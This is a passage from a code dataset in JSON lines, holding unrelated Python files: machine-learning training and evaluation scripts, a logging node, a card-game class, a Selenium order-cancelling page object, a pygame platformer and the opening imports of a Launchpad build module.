print(agg_results)\n\ndef confuse(output_path, model, classifiers, data_loader):\n ## create an empty file and skip the evaluation if the file exists\n if args.save_to_file:\n if os.path.isfile(output_path):\n print(\"=> Output ({}) exists. 
Skipping.\".format(output_path))\n return {'skipped': True}\n open(output_path, 'a').close()\n\n if 'special' in model.keys():\n print(\"=> Special mode evaluation: {}.\".format(model['special']))\n\n ## setup meters\n masked_in_score = ScoreContainer(classifiers)\n masked_out_score = ScoreContainer(classifiers)\n inpainted_score = ScoreContainer(classifiers)\n\n ## initialize normalizer\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n ## data loop\n for i, (input, target) in enumerate(data_loader):\n if i > len(data_loader)*args.pot:\n print('')\n break\n\n if i % 10 == 1:\n print('.', end='', flush=True)\n if i + 10 >= len(data_loader)*args.pot: print('')\n\n ## compute continuous mask, thresholded mask and compare class predictions with targets\n if 'special' in model.keys():\n if model['special'] == 'zero':\n binary_mask = torch.zeros(input.size(0), 1, 224, 224)\n if model['special'] == 'one':\n binary_mask = torch.ones(input.size(0), 1, 224, 224)\n if model['special'] == 'random56':\n binary_mask = torch.zeros(input.size(0), 1, 56, 56)\n binary_mask.bernoulli_(0.5)\n binary_mask = nn.Upsample(scale_factor=4, mode='nearest')(binary_mask)\n if model['special'] == 'random224':\n binary_mask = torch.zeros(input.size(0), 1, 224, 224)\n binary_mask.bernoulli_(0.5)\n else:\n normalized_input = input.clone()\n for id in range(input.size(0)):\n normalize(normalized_input[id]) \n binary_mask = get_binarized_mask(normalized_input, model)\n\n masked_in, masked_out = get_masked_images(input, binary_mask)\n inpainted = inpaint(binary_mask, masked_out)\n\n for id in range(input.size(0)):\n normalize(masked_in[id])\n normalize(masked_out[id])\n normalize(inpainted[id])\n\n ## compute outputs on masked images\n target = target.to(device)\n for key in classifiers.keys():\n with torch.no_grad():\n masked_in_score.update(classifiers[key](masked_in.to(device)), target, key)\n masked_out_score.update(classifiers[key](masked_out.to(device)), target, key)\n inpainted_score.update(classifiers[key](inpainted.to(device)), target, key)\n\n results = {}\n results['masked_in'] = {}\n results['masked_out'] = {}\n results['inpainted'] = {}\n for key in classifiers.keys():\n results['masked_in'][key] = masked_in_score.getDictionary(key)\n results['masked_out'][key] = masked_out_score.getDictionary(key)\n results['inpainted'][key] = inpainted_score.getDictionary(key)\n\n if args.save_to_file:\n with open(output_path, 'a') as f:\n f.write(str(results))\n f.write('\\n' + string_args)\n\n print(results)\n\n return results\n\nclass ScoreContainer(object):\n def __init__(self, classifiers):\n self.criterion = nn.CrossEntropyLoss().to(device)\n\n self.losses = {}\n self.top1 = {}\n self.top5 = {}\n self.ent = {}\n for key in classifiers.keys():\n self.losses[key] = AverageMeter()\n self.top1[key] = AverageMeter()\n self.top5[key] = AverageMeter()\n self.ent[key] = AverageMeter() \n\n def update(self, output, target, key):\n with torch.no_grad():\n loss = self.criterion(output, target)\n self.losses[key].update(loss.item(), target.size(0))\n t1, t5 = accuracy(output, target, topk=(1, 5))\n self.top1[key].update(t1.item(), target.size(0))\n self.top5[key].update(t5.item(), target.size(0))\n\n log_prob = F.log_softmax(output,1)\n prob = log_prob.exp()\n entropy = -(log_prob * prob).sum(1).data\n self.ent[key].update(entropy.mean().item(), target.size(0)) \n\n def getDictionary(self, key):\n return {\n 'l': self.losses[key].avg,\n 't1': self.top1[key].avg,\n 't5': 
self.top5[key].avg,\n 'e': self.ent[key].avg\n }\n\nif __name__ == '__main__':\n main()","repo_name":"kondiz/casme","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":8933,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"61"} +{"seq_id":"37750113835","text":"\"\"\"Simple success node: log a message at specified log level\n\nAuthor(s):\n Carl Anderson (carl.anderson@weightwatchers.com)\n\n\"\"\"\nimport logging\nfrom primrose.base.success import AbstractSuccess\n\n\nclass LoggingSuccess(AbstractSuccess):\n \"\"\"simple success node: log a message\"\"\"\n\n @staticmethod\n def necessary_config(node_config):\n \"\"\"Return a list of necessary configuration keys within the implementation\n\n Args:\n node_config (dict): set of parameters / attributes for the node\n\n Note:\n msg: message you want logged\n level: one of 'DEBUG', 'INFO', 'WARN', 'ERROR', 'CRITICAL'\n\n Returns:\n set of keys necessary to run implementation\n\n \"\"\"\n return set([\"msg\", \"level\"])\n\n def run(self, data_object):\n \"\"\"Signal success by logging a message at specified log level\n\n Args:\n data_object (DataObject): DataObject instance\n\n Returns:\n nothing. Side effect is to signal success via logging\n\n \"\"\"\n msg = self.node_config[\"msg\"]\n\n level = str(self.node_config[\"level\"]).upper()\n\n # check whether valid level: will throw KeyError if level not recognized\n logging._nameToLevel[level]\n\n level = logging.getLevelName(level)\n\n logging.getLogger(\"\")._log(level, msg, None, None)\n\n terminate = False\n\n return data_object, terminate\n","repo_name":"ww-tech/primrose","sub_path":"primrose/cleanup/logging_success.py","file_name":"logging_success.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"4388147543","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nimport torch.nn.functional as F\n\nimport os\nimport shutil\nimport argparse\nimport numpy as np\n\nfrom methods import *\nimport models\nimport torchvision\nimport torchvision.transforms as transforms\nfrom utils import cal_param_size, cal_multi_adds, correct_num, adjust_lr, DistillKL, AverageMeter\nfrom dataloader.dataloaders import load_dataset\n\n\nimport time\nimport math\n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR Training')\nparser.add_argument('--dataset', default='CIFAR-100', type=str, help='Dataset')\nparser.add_argument('--data', default='./data/', type=str, help='Dataset directory')\nparser.add_argument('--arch', default='CIFAR_ResNet18', type=str, help='network architecture')\nparser.add_argument('--init-lr', default=0.1, type=float, help='learning rate')\nparser.add_argument('--warmup-epoch', default=5, type=int, help='warmup epoch')\nparser.add_argument('--lr-type', default='multistep', type=str, help='learning rate strategy')\nparser.add_argument('--data-aug', default='None', type=str, help='extra data augmentation')\nparser.add_argument('--milestones', default=[100, 150], type=list, help='milestones for lr-multistep')\nparser.add_argument('--epochs', type=int, default=200, help='number of epochs to train')\nparser.add_argument('--batch-size', type=int, default=128, help='batch size')\nparser.add_argument('--num-workers', type=int, default=8, help='number of workers')\nparser.add_argument('--method', default='cross_entropy', type=str, 
help='method')\nparser.add_argument('--gpu-id', type=str, default='0')\nparser.add_argument('--weight-decay', type=float, default=5e-4, help='weight decay')\nparser.add_argument('--weight-cls', type=float, default=1, help='weight for cross-entropy loss')\nparser.add_argument('--weight-kd', type=float, default=1, help='weight for KD loss')\nparser.add_argument('--T', type=float, default=4, help='temperature for KD distillation')\nparser.add_argument('--omega', default=0.5, type=float, help='ensembling weight in BAKE')\nparser.add_argument('--intra-imgs', '-m', default=3, type=int, help='intra-class images, M in BAKE')\nparser.add_argument('--alpha-T', default=0.8, type=float, help='alpha T in PS-KD')\nparser.add_argument('--manual_seed', type=int, default=0)\nparser.add_argument('--checkpoint-dir', default='./checkpoint/', type=str, help='saved checkpoint directory')\nparser.add_argument('--eval-checkpoint', default='./checkpoint/resnet18_best.pth', type=str, help='evaluate checkpoint directory')\nparser.add_argument('--resume-checkpoint', default='./checkpoint/resnet18.pth', type=str, help='resume checkpoint directory')\nparser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\nparser.add_argument('--evaluate', '-e', action='store_true', help='evaluate model')\n\n# global hyperparameter set\nargs = parser.parse_args()\nprint(args)\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_id\n\n\ninfo = str(os.path.basename(__file__).split('.')[0]) \\\n + '_dataset_' + args.dataset \\\n + '_arch_' + args.arch \\\n + '_method_' + args.method \\\n + '_data_aug_' + args.data_aug \\\n + '_' + str(args.manual_seed)\n\n\nargs.checkpoint_dir = os.path.join(args.checkpoint_dir, info)\nif not os.path.isdir(args.checkpoint_dir):\n os.makedirs(args.checkpoint_dir)\nargs.log_txt = os.path.join(args.checkpoint_dir, info + '.txt')\n\nprint('dir for checkpoint:', args.checkpoint_dir)\nwith open(args.log_txt, 'a+') as f:\n f.write(\"==========\\nArgs:{}\\n==========\".format(args) + '\\n')\n \n\nnp.random.seed(args.manual_seed)\ntorch.manual_seed(args.manual_seed)\ntorch.cuda.manual_seed_all(args.manual_seed)\n\ntrainloader, valloader = load_dataset(args=args)\n\nprint('Dataset: '+ args.dataset)\nif args.dataset.startswith('CIFAR'):\n num_classes = len(set(trainloader.dataset.targets))\nelse:\n num_classes = len(set(trainloader.dataset.classes))\n\nprint('Number of train dataset: ' ,len(trainloader.dataset))\nprint('Number of validation dataset: ' ,len(valloader.dataset))\nprint('Number of classes: ' , num_classes)\nC, H, W = trainloader.dataset[0][0][0].size() if isinstance(trainloader.dataset[0][0], list) is True else trainloader.dataset[0][0].size()\n# --------------------------------------------------------------------------------------------\n\n# Model\nprint('==> Building model..')\nmodel = getattr(models, args.arch)\n\nif args.method == 'virtual_softmax':\n net = model(num_classes=num_classes, is_bias=False).eval()\nelse:\n net = model(num_classes=num_classes).eval()\n\n\nprint('Arch: %s, Params: %.2fM, Multi-adds: %.2fG'\n % (args.arch, cal_param_size(net) / 1e6, cal_multi_adds(net, (1, C, H, W)) / 1e9))\n\ndel (net)\n\n\nif args.method == 'virtual_softmax':\n net = model(num_classes=num_classes, is_bias=False).cuda()\nelse:\n net = model(num_classes=num_classes).cuda()\n\nnet = torch.nn.DataParallel(net)\ncudnn.benchmark = True\n\n\n\n# Training\ndef train(epoch, criterion_list, optimizer):\n train_loss = AverageMeter('train_loss', ':.4e')\n train_loss_cls = 
AverageMeter('train_loss_cls', ':.4e')\n train_loss_div = AverageMeter('train_loss_div', ':.4e')\n top1_num = 0\n top5_num = 0\n total = 0\n\n if epoch >= args.warmup_epoch:\n lr = adjust_lr(optimizer, epoch, args)\n start_time = time.time()\n criterion_cls = criterion_list[0]\n criterion_div = criterion_list[1]\n\n if args.method.startswith('PSKD'):\n if epoch == 0:\n all_predictions = torch.zeros(len(trainloader.dataset), num_classes, dtype=torch.float32)\n else:\n all_predictions = torch.load(os.path.join(args.checkpoint_dir, 'predictions.pth.tar'), map_location=torch.device('cpu'))['prev_pred']\n \n net.train()\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n batch_start_time = time.time()\n if isinstance(inputs, list) is False:\n inputs = inputs.cuda()\n batch_size = inputs.size(0)\n else:\n batch_size = inputs[0].size(0)\n \n if isinstance(targets, list) is False:\n targets = targets.cuda()\n else:\n input_indices = targets[1].cuda()\n targets = targets[0].cuda()\n\n if epoch < args.warmup_epoch:\n lr = adjust_lr(optimizer, epoch, args, batch_idx, len(trainloader))\n\n loss_div = torch.tensor(0.).cuda()\n loss_cls = torch.tensor(0.).cuda()\n\n \n if args.method == 'cross_entropy':\n logit = net(inputs)\n loss_cls += criterion_cls(logit, targets)\n elif args.method == 'mixup': \n logit, mixup_loss = Mixup(net, inputs, targets, criterion_cls, alpha=0.4)\n loss_cls += mixup_loss\n elif args.method == 'manifold_mixup': \n logit, manifold_mixup_loss = ManifoldMixup(net, inputs, targets, criterion_cls, alpha=2.0)\n loss_cls += manifold_mixup_loss\n elif args.method == 'cutmix': \n logit, cutmix_loss = CutMix(net, inputs, targets, criterion_cls, alpha=1.0)\n loss_cls += cutmix_loss\n elif args.method == 'label_smooth':\n logit = net(inputs)\n loss_cls += LabelSmooth(logit, targets, num_classes=num_classes)\n elif args.method == 'FocalLoss':\n logit = net(inputs) \n loss_cls += FocalLoss(logit, targets)\n elif args.method == 'TF_KD_self_reg':\n logit = net(inputs)\n loss_cls += criterion_cls(logit, targets)\n loss_div += TF_KD_reg(logit, targets, num_classes, epsilon=0.1, T=20)\n elif args.method == 'virtual_softmax':\n logit = net(inputs, targets, loss_type='virtual_softmax')\n loss_cls += criterion_cls(logit, targets)\n elif args.method == 'Maximum_entropy':\n logit = net(inputs, targets)\n entropy = (F.softmax(logit, dim=1) * F.log_softmax(logit, dim=1)).mean()\n loss_cls += criterion_cls(logit, targets) + 0.5 * entropy\n\n elif args.method == 'DKS':\n logit, dks_loss_cls, dks_loss_div = DKS(net, inputs, targets, criterion_cls, criterion_div)\n loss_cls += dks_loss_cls\n loss_div += dks_loss_div\n\n elif args.method == 'SAD':\n logit, sad_loss_cls, sad_loss_div = SAD(net, inputs, targets, criterion_cls, criterion_div)\n loss_cls += sad_loss_cls\n loss_div += sad_loss_div\n \n elif args.method == 'BYOT':\n logit, byot_loss_cls, byot_loss_div = BYOT(net, inputs, targets, criterion_cls, criterion_div)\n loss_cls += byot_loss_cls\n loss_div += byot_loss_div\n\n elif args.method == 'DDGSD':\n logit, ddsgd_loss_cls, ddsgd_loss_div = DDGSD(net, inputs, targets, criterion_cls, criterion_div)\n loss_cls += ddsgd_loss_cls\n loss_div += ddsgd_loss_div\n\n elif args.method == 'CS-KD':\n logit, cs_kd_loss_cls, cs_kd_loss_div = CS_KD(net, inputs, targets, criterion_cls, criterion_div)\n targets = targets[:batch_size//2]\n batch_size = batch_size // 2\n loss_cls += cs_kd_loss_cls\n loss_div += cs_kd_loss_div\n \n elif args.method.startswith('FRSKD'):\n logit, frskd_loss_cls, 
frskd_loss_div = FRSKD(net, inputs, targets, criterion_cls, criterion_div)\n loss_cls += frskd_loss_cls\n loss_div += frskd_loss_div\n\n elif args.method.startswith('PSKD'):\n logit, pskd_loss_cls = PSKD(net, inputs, targets, input_indices, epoch, all_predictions, num_classes, args)\n loss_cls += pskd_loss_cls\n\n elif args.method.startswith('BAKE'):\n logit, bake_loss_cls, bake_loss_div = BAKE(net, inputs, targets, criterion_cls, criterion_div, args)\n loss_cls += bake_loss_cls\n loss_div += bake_loss_div\n \n else:\n raise ValueError('Unknown method: {}'.format(args.method))\n loss = loss_cls + loss_div\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n train_loss.update(loss.item(), batch_size)\n train_loss_cls.update(loss_cls.item(), batch_size)\n train_loss_div.update(loss_div.item(), batch_size)\n\n top1, top5 = correct_num(logit, targets, topk=(1, 5))\n top1_num += top1\n top5_num += top5\n total += targets.size(0)\n \n print('Epoch:{}, batch_idx:{}/{}, lr:{:.5f}, Acc:{:.4f}, Duration:{:.2f}'.format(epoch, batch_idx, len(trainloader), lr, top1_num.item() / total, time.time()-batch_start_time))\n\n train_info = 'Epoch:{}\\t lr:{:.5f}\\t duration:{:.3f}'\\\n '\\ntrain_loss:{:.5f}\\t train_loss_cls:{:.5f}'\\\n '\\t train_loss_div:{:.5f}' \\\n '\\ntrain top1_acc: {:.4f} \\t train top5_acc:{:.4f}' \\\n .format(epoch, lr, time.time() - start_time,\n train_loss.avg, train_loss_cls.avg,\n train_loss_div.avg, (top1_num/total).item(), (top5_num/total).item())\n print(train_info)\n with open(args.log_txt, 'a+') as f:\n f.write(train_info+'\\n')\n\n if args.method.startswith('PSKD'):\n torch.save({'prev_pred': all_predictions.cpu()}, os.path.join(args.checkpoint_dir, 'predictions.pth.tar'))\n\n\n\ndef test(epoch, criterion_list):\n test_loss = AverageMeter('test_loss', ':.4e')\n top1_num = 0\n top5_num = 0\n total = 0\n\n criterion_cls = criterion_list[0]\n net.eval()\n with torch.no_grad():\n for batch_idx, (inputs, targets) in enumerate(valloader):\n inputs = inputs.cuda()\n targets = targets.cuda()\n\n logit = net(inputs)\n \n if isinstance(logit, list) or isinstance(logit, tuple):\n logit = logit[0]\n loss_cls = criterion_cls(logit, targets)\n \n\n test_loss.update(loss_cls.item(), inputs.size(0))\n\n top1, top5 = correct_num(logit, targets, topk=(1, 5))\n top1_num += top1\n top5_num += top5\n total += targets.size(0)\n\n print('Epoch:{}, batch_idx:{}/{}, Acc:{:.4f}'.format(epoch, batch_idx, len(trainloader), top1_num.item() / total))\n\n\n test_info = 'test_loss:{:.5f}\\t test top1_acc:{:.4f} \\t test top5_acc:{:.4f} \\n' \\\n .format(test_loss.avg, (top1_num/total).item(), (top5_num/total).item())\n with open(args.log_txt, 'a+') as f:\n f.write(test_info)\n print(test_info)\n\n return (top1_num/total).item()\n\n\n\nif __name__ == '__main__':\n best_acc = 0. 
# best test accuracy\n start_epoch = 0 # start from epoch 0 or last checkpoint epoch\n\n criterion_cls = nn.CrossEntropyLoss()\n criterion_div = DistillKL(args.T)\n\n criterion_list = nn.ModuleList([])\n criterion_list.append(criterion_cls) # classification loss\n criterion_list.append(criterion_div)\n criterion_list.cuda()\n\n if args.evaluate:\n print('load trained weights from '+ args.eval_checkpoint)\n checkpoint = torch.load(args.eval_checkpoint,\n map_location=torch.device('cpu'))\n net.module.load_state_dict(checkpoint['net'])\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch'] + 1\n top1_acc = test(start_epoch, criterion_list)\n else:\n trainable_list = nn.ModuleList([])\n trainable_list.append(net)\n optimizer = optim.SGD(trainable_list.parameters(), lr=args.init_lr, momentum=0.9, weight_decay=args.weight_decay, nesterov=True)\n\n if args.resume:\n print('Resume from '+ args.resume_checkpoint)\n checkpoint = torch.load(args.resume_checkpoint,\n map_location=torch.device('cpu'))\n net.module.load_state_dict(checkpoint['net'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch']+1\n\n for epoch in range(start_epoch, args.epochs):\n train(epoch, criterion_list, optimizer)\n acc = test(epoch, criterion_list)\n\n state = {\n 'net': net.module.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n 'optimizer': optimizer.state_dict()\n }\n torch.save(state, os.path.join(args.checkpoint_dir, model.__name__ + '.pth.tar'))\n\n is_best = False\n if best_acc < acc:\n best_acc = acc\n is_best = True\n\n if is_best:\n shutil.copyfile(os.path.join(args.checkpoint_dir, model.__name__ + '.pth.tar'),\n os.path.join(args.checkpoint_dir, model.__name__ + '_best.pth.tar'))\n\n print('Evaluate the best model:')\n args.evaluate = True\n checkpoint = torch.load(args.checkpoint_dir + '/' + model.__name__ + '_best.pth.tar',\n map_location=torch.device('cpu'))\n net.module.load_state_dict(checkpoint['net'])\n start_epoch = checkpoint['epoch']\n top1_acc = test(start_epoch, criterion_list)\n\n with open(args.log_txt, 'a+') as f:\n f.write('best_accuracy: {} \\n'.format(best_acc))\n print('best_accuracy: {} \\n'.format(best_acc))\n\n","repo_name":"winycg/Self-KD-Lib","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15303,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"61"} +{"seq_id":"6341695355","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/8/19 21:00\n# @Author : zxl\n# @FileName: test.py\n\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import roc_auc_score,f1_score,recall_score,precision_score,accuracy_score\nfrom Model.Modules.net_utils import gather_indexes\n\n\nbatch_size = 2\nseq_len = 3\nM = 5\n\n\ntime_lst = tf.constant([[0,0,0],\n [1,2,2]],dtype=tf.float32)\n\nsingle_odd_mask = np.zeros(shape = (M,))\nsingle_odd_mask[::2] = 1\nsingle_odd_mask = tf.convert_to_tensor(single_odd_mask,dtype=tf.float32) # M,\nsingle_even_mask = np.zeros(shape = (M,))\nsingle_even_mask[1::2] = 1\nsingle_even_mask = tf.convert_to_tensor(single_even_mask,dtype=tf.float32)\n\nemb_time_lst = tf.tile(tf.expand_dims(time_lst,axis = 2),[1,1,M]) # batch_size, seq_len, M\n\nsingle_odd_deno = tf.to_float(10000 ** (tf.range(start = 0, limit = M, delta = 1)/M))# M,\nsingle_even_deno = tf.to_float(10000 **(tf.range(start = 1, limit = M+1, delta = 1)/M))\n\nodd_emb = tf.cos(emb_time_lst/single_odd_deno)\neven_emb = tf.sin(emb_time_lst/single_even_deno)\ntime_lst_emb = 
odd_emb * single_odd_mask + even_emb * single_even_mask\n\n# b = tf.Variable(tf.random_normal([1]))\n# loss = tf.reduce_mean(tf.reduce_mean(masked_emb,axis = 2),axis = 1) + b\n# train = tf.train.AdamOptimizer(0.001).minimize(loss)\n\n\nwith tf.Session() as sess:\n print(sess.run(time_lst_emb))\n # print(sess.run(even_mask))\n print('---------------')\n\n\n # cur_time_lst = np.array([[0., 0., 0.],\n # [1., 2., 2.]])\n # feed_dict = {}\n # feed_dict[time_lst] = cur_time_lst\n # sess.run(tf.global_variables_initializer(), feed_dict)\n # sess.run(tf.local_variables_initializer(), feed_dict)\n #\n # for epoch in range(10):\n # cur_time_lst = np.random.rand(2,3)\n # feed_dict = {}\n # feed_dict[time_lst] = cur_time_lst\n # sess.run(train, feed_dict )\n # print(sess.run(loss,feed_dict))\n\n\n # print(sess.run(result))\n\n\n\n# indices = tf.constant([[4], [3], [1], [7]])\n# updates = tf.constant([9, 10, 11, 12])\n# shape = tf.constant([8])\n# scatter = tf.scatter_nd(indices, updates, shape)\n# with tf.Session() as sess:\n# print(sess.run(scatter))\n","repo_name":"Jane11111/TPP_V2","sub_path":"test/test_time_emb.py","file_name":"test_time_emb.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8939646248","text":"from SleepingQueens.Position import HandPosition\nfrom SleepingQueens.dataStructures import Card\nfrom SleepingQueens.dataStructures import CardType\nfrom SleepingQueens.DrawingAndTrashPile import DrawingAndTrashPile\nfrom SleepingQueens.DrawingAndTrashPile import DiscardAll\n\n\nclass Hand:\n\n def __init__(self, playerIdx : int, currentHand : dict[int,Card], drawingAndTrashPile : DrawingAndTrashPile):\n self.playerIdx = playerIdx\n self.pickedCards : list[Card]\n self.currentHand = currentHand\n self.drawingAndTrashPile = drawingAndTrashPile #toto sem spadne z Game() pri inicializacii\n\n def pickCards(self, positions : list[HandPosition]) -> list[Card]: #\n out = []\n for pos in positions:\n out.append(self.currentHand[pos.getCardIndex()])\n\n self.pickedCards = out\n return out\n\n def removePickedCardsAndRedraw(self) -> list[Card]:\n return self.drawingAndTrashPile.discardAndDraw(self.pickedCards,\n DiscardAll(self.drawingAndTrashPile.drawingPile,\n self.drawingAndTrashPile.trashPile,\n self.returnPickedCards(),))\n def returnPickedCards(self):\n return self.pickedCards\n\n def hasCardOfType(self, type : CardType):\n for index,card in self.currentHand.items():\n if type == card.type:\n return HandPosition(index, self.playerIdx)\n #ak nema hrac danu kartu\n return HandPosition(-1, -1)\n\n def getCards(self):\n return [i for i in self.currentHand.values()]\n","repo_name":"mibrix/PTS_DU_git","sub_path":"SleepingQueens/Hand.py","file_name":"Hand.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8827623885","text":"from po.base_page import BasePage\n\nclass OrderPage(BasePage):\n URL = 'http://testingedu.com.cn:8000/index.php/Home/Order/order_list.html'\n\n def cancel_order(self):\n \n self.get_url(self.URL)\n self.sleep(2)\n print(\"self.order_no:\",self.driver.order_no)\n locator = '//em[text()=\"%s\"]/../..//a[text()=\"取消订单\"]'%self.driver.order_no\n self.click(locator)\n self.click('//a[text()=\"确定\"]')\n 
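# '取消订单' means Cancel order (the link is matched by the stored order number); '确定' means Confirm (the button in the confirmation dialog)\n 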
self.sleep(5)\n","repo_name":"candice0430/mall_ui_test","sub_path":"po/OrderPage.py","file_name":"OrderPage.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5358712932","text":"import pygame\nimport time\n\nfrom modules import playerChar as pc\nfrom modules import collide_block as cb\n\ndef main():\n\n pygame.init()\n screen = (800,600)\n game_window = pygame.display.set_mode(screen)\n game_window.fill((38,237,229))\n pygame.display.flip()\n \n \n game_clock = pygame.time.Clock()\n \n # hard coded blocks/terrain\n collide_block0 = cb.collide_block(pygame,72,420)\n collide_block = cb.collide_block(pygame,200,420)\n collide_block3 = cb.collide_block(pygame,264,420)\n collide_block5 = cb.collide_block(pygame,328,420)\n collide_block6 = cb.collide_block(pygame,392,420)\n collide_block7 = cb.collide_block(pygame,456,420)\n collide_block8 = cb.collide_block(pygame,520,420)\n collide_block9 = cb.collide_block(pygame,136,420)\n collide_block10 = cb.collide_block(pygame,456,356)\n collide_block11 = cb.collide_block(pygame,456,292)\n collide_block12 = cb.collide_block(pygame,456,228)\n collide_block13 = cb.collide_block(pygame,200,282)\n collide_block14 = cb.collide_block(pygame,264,282)\n\n block_list = []\n block_list.append(collide_block)\n block_list.append(collide_block3)\n block_list.append(collide_block5)\n block_list.append(collide_block6)\n block_list.append(collide_block7)\n block_list.append(collide_block8)\n block_list.append(collide_block9)\n block_list.append(collide_block10)\n block_list.append(collide_block11)\n block_list.append(collide_block12)\n block_list.append(collide_block13)\n block_list.append(collide_block14)\n block_list.append(collide_block0)\n \n player = pc.playerChar(pygame,200,270)\n\n game_window.fill((10,100,40))\n\n grounded = False\n can_jump = [0]\n touching_top_block = [0]\n projectiles = []\n while(True):\n \n \n game_clock.tick(150)\n game_window.fill((3,245,229))\n \n player.y += 1\n player.hitbox.y +=1\n\n for i in block_list:\n game_window.blit(i.img,(i.x,i.y))\n \n \n player.player_move(can_jump)\n touching_top_block[0] = 0\n for i in block_list:\n if(player.hitbox.colliderect(i.up)):\n can_jump[0] = 1\n\n player.y -=1\n player.hitbox.y -=1\n \n touching_top_block[0] = 1\n \n if(player.hitbox.colliderect(i.left)):\n player.velocity_x -= 1\n player.velocity_y = 0\n \n continue\n if(player.hitbox.colliderect(i.right)):\n player.velocity_x += 1\n player.velocity_y = 0\n \n continue\n if(player.hitbox.colliderect(i.down)):\n player.velocity_y +=2\n continue\n if(touching_top_block[0] == 0):\n can_jump[0] = 0\n\n \n game_window.blit(player.img,(player.x,player.y)) \n \n pygame.display.flip()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return 0\n\n \nmain()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jsteyn135/python-pygame-basic-hitboxes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4187172269","text":"import pygame\nfrom pygame.locals import *\nimport numpy as np\nimport ctypes\n\n\npygame.init()\nctypes.windll.user32.SetProcessDPIAware()\n\n# Display variables\ninfoObject = pygame.display.Info()\n\n# display_width = 1550\n# display_height = 835\ndisplay_width = infoObject.current_w\ndisplay_height = infoObject.current_h\n\ndisplay_area = display_width * display_height\n\nblack = 
(0,0,0)\nwhite = (255,255,255)\nred = (255,0,0)\nblue = (0,0,255)\ngreen = (0,255,0)\norange = (255,165,0)\ngray = (127,127,127)\n\n# Camera Variables\nbg = None\ncalibrate_frames = 30\ntop, right, bottom, left = 195, 255, 430, 420\naWeight = 0.5\n\n# PyGame variables\nflags = DOUBLEBUF\nwin = pygame.display.set_mode((display_width, display_height), flags)\npygame.display.set_caption('NARUTO: THE COMPUTER-VISION GAME')\n\nplayer_turn = True\nactive_health = 0\nactive_damage = 0\n\n# Model Variables\nnum_frames = 0\ncount = 0\nmean_cutoff = 6\naccumulated_predictions = np.array([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], dtype='float64')\ntop_signs = []\nsequence = []\nsigns = ['bird', 'boar', 'dog', 'dragon', 'hare', 'horse', 'monkey', 'ox', 'ram', 'rat', 'serpent', 'tiger']\n\n# Options\neasymode = False\nhardmode = True\nshowsigns = True\n","repo_name":"averyzgriffin/NarutoCV","sub_path":"global_variables.py","file_name":"global_variables.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36042843464","text":"__metaclass__ = type\n__all__ = [\n 'BinaryPackageBuild',\n 'BinaryPackageBuildSet',\n ]\n\nimport datetime\nfrom operator import itemgetter\n\nimport apt_pkg\nimport pytz\nfrom sqlobject import SQLObjectNotFound\nfrom storm.expr import (\n Desc,\n Join,\n LeftJoin,\n Or,\n )\nfrom storm.locals import (\n Bool,\n DateTime,\n Int,\n Reference,\n Unicode,\n )\nfrom storm.store import (\n EmptyResultSet,\n Store,\n )\nfrom storm.zope import IResultSet\nfrom zope.component import getUtility\nfrom zope.interface import implements\n\nfrom lp.app.browser.tales import DurationFormatterAPI\nfrom lp.app.errors import NotFoundError\nfrom lp.app.interfaces.launchpad import ILaunchpadCelebrities\nfrom lp.archivepublisher.utils import get_ppa_reference\nfrom lp.buildmaster.enums import (\n BuildFarmJobType,\n BuildStatus,\n )\nfrom lp.buildmaster.interfaces.buildfarmjob import IBuildFarmJobSource\nfrom lp.buildmaster.model.builder import Builder\nfrom lp.buildmaster.model.buildfarmjob import BuildFarmJob\nfrom lp.buildmaster.model.buildqueue import BuildQueue\nfrom lp.buildmaster.model.packagebuild import PackageBuildMixin\nfrom lp.registry.interfaces.distribution import IDistribution\nfrom lp.registry.interfaces.distroseries import IDistroSeries\nfrom lp.registry.interfaces.pocket import PackagePublishingPocket\nfrom lp.registry.model.sourcepackagename import SourcePackageName\nfrom lp.services.config import config\nfrom lp.services.database.bulk import load_related\nfrom lp.services.database.decoratedresultset import DecoratedResultSet\nfrom lp.services.database.enumcol import DBEnum\nfrom lp.services.database.interfaces import IStore\nfrom lp.services.database.sqlbase import (\n SQLBase,\n sqlvalues,\n )\nfrom lp.services.job.model.job import Job\nfrom lp.services.librarian.browser import ProxiedLibraryFileAlias\nfrom lp.services.librarian.model import (\n LibraryFileAlias,\n LibraryFileContent,\n )\nfrom lp.services.mail.helpers import (\n get_contact_email_addresses,\n get_email_template,\n )\nfrom lp.services.mail.sendmail import (\n format_address,\n 